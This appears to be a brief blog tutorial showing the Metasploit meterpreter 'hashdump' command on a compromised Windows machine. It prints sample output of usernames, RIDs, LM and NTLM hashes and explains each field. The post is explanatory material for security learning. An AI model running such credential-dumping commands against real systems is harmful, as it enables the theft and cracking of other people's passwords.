Metasploit: Finding Password in Windows Password Hash File

With the meterpreter shell session open

meterpreter > hashdump

The contents of the target system’s password hash file are output to the screen.

Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582::: 
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904::: 
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E::: 
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::<123

Each field is separated with colon. The fields are:

1st field: username (Administrator, User1, etc.)

2nd field: Relative Identification (RID): last 3–4 digits of the Security Identifier (SID), which are unique to each user

3rd field: LM hash

4th field: NTLM hash

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

A WordPress.com Website.

Up ↑

%d bloggers like this: